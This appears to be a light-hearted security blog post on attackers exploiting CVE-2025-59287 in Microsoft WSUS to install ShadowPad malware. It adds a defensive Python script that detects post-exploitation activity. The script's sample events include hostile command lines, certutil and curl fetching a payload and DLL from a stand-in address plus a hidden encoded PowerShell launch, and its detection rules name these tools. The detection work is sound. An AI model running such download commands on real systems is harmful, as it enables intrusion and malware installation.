ShadowPad Attack Strikes Again: Critical Microsoft WSUS Vulnerability Exploited by Hackers

Attackers are exploiting a patched Windows Server flaw, CVE-2025-59287, to distribute ShadowPad malware. This vulnerability, a critical deserialization flaw in WSUS, enables remote code execution. It’s like leaving your front door unlocked, only to find malware has made itself at home, snuggled on your server, munching on your data cookies!


Hot Take:

When life gives you WSUS vulnerabilities, apparently threat actors make ShadowPad-aid! Microsoft Windows Server Update Services may need a better bouncer at the door since it seems like anyone with a convincing CVE can waltz right in and start serving malware hors d’oeuvres.

Key Points:

  • Threat actors exploited a flaw in WSUS to distribute ShadowPad malware.
  • The attack used CVE-2025-59287, a deserialization vulnerability, for initial access.
  • Tools like PowerCat, curl, and certutil were leveraged for system access and malware installation.
  • ShadowPad, a backdoor favored by Chinese state-sponsored groups, was installed via DLL side-loading.
  • The flaw is reachable over the network without authentication and yields code execution with the privileges of the WSUS service, so WSUS servers that are still unpatched or exposed to untrusted networks are the ones at risk.
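The key points describe a chain that leaves a recognisable trail in process-creation telemetry: the WSUS host process spawning a shell, then certutil or curl pulling down payloads, then a PowerCat or encoded-PowerShell stage. The script below is an added example written for this page, not code from the report or from any tooling it mentions. It assumes Sysmon Event ID 1-style fields (ParentImage, Image, CommandLine) and assumes, as a working hypothesis, that a successful WSUS deserialization exploit lands in WsusService.exe or the IIS worker w3wp.exe, so a shell spawned from either is the first thing to alert on. The sample events, process IDs and the 198.51.100.7 address are constructed for illustration.

```python
"""Flag process-creation events that look like post-exploitation on a WSUS host.

Added example for this article; sample events below are constructed and
modelled on Sysmon Event ID 1 fields, not taken from any real incident.
"""
import re

# Assumption: exploitation of the WSUS deserialization bug executes inside one
# of these processes, so a command interpreter spawned by them is suspicious.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Living-off-the-land download/staging patterns for the tools named in the
# report (certutil, curl, PowerCat) plus encoded PowerShell, a common loader.
LOLBIN_RULES = [
    ("certutil download/decode",
     re.compile(r"certutil(\.exe)?\s+.*-(urlcache|decode)", re.I)),
    ("curl writes to disk",
     re.compile(r"\bcurl(\.exe)?\s+.*(-o\b|--output\b)", re.I)),
    ("PowerCat", re.compile(r"powercat", re.I)),
    ("encoded PowerShell",
     re.compile(r"powershell(\.exe)?\s+.*-(e|enc|encodedcommand)\b", re.I)),
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the list of findings for one process-creation event (empty if benign)."""
    findings = []
    parent = basename(ev["ParentImage"])
    image = basename(ev["Image"])
    if parent in WSUS_PARENTS and image in SHELLS:
        findings.append(f"WSUS process {parent} spawned {image}")
    for name, pattern in LOLBIN_RULES:
        if pattern.search(ev["CommandLine"]):
            findings.append(name)
    return findings


def scan(events):
    """Return (ProcessId, findings) for every event that triggers at least one rule."""
    hits = []
    for ev in events:
        findings = check_event(ev)
        if findings:
            hits.append((ev["ProcessId"], findings))
    return hits


# Constructed sample telemetry: three malicious-looking events, two benign ones.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -e SQBFAFgAIAAo"},
    {"ProcessId": 4188,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/upd.dat C:\Windows\Temp\upd.dat"},
    {"ProcessId": 4202,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\ProgramData\svc.dll http://198.51.100.7/svc.dll"},
    {"ProcessId": 912,
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"ProcessId": 5330,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process -Name w3wp"},
]


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(findings))
```

The parent/child rule is the high-signal one: a WSUS service process has no business launching cmd.exe or PowerShell, so that alert should fire on its own even when the download stage uses a tool the regexes do not cover. The LOLBIN patterns are deliberately loose and will need tuning against an environment's normal admin activity; certutil in particular is used legitimately for certificate work, so alert on the -urlcache and -decode switches rather than on the binary itself.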

The Nimble Nerd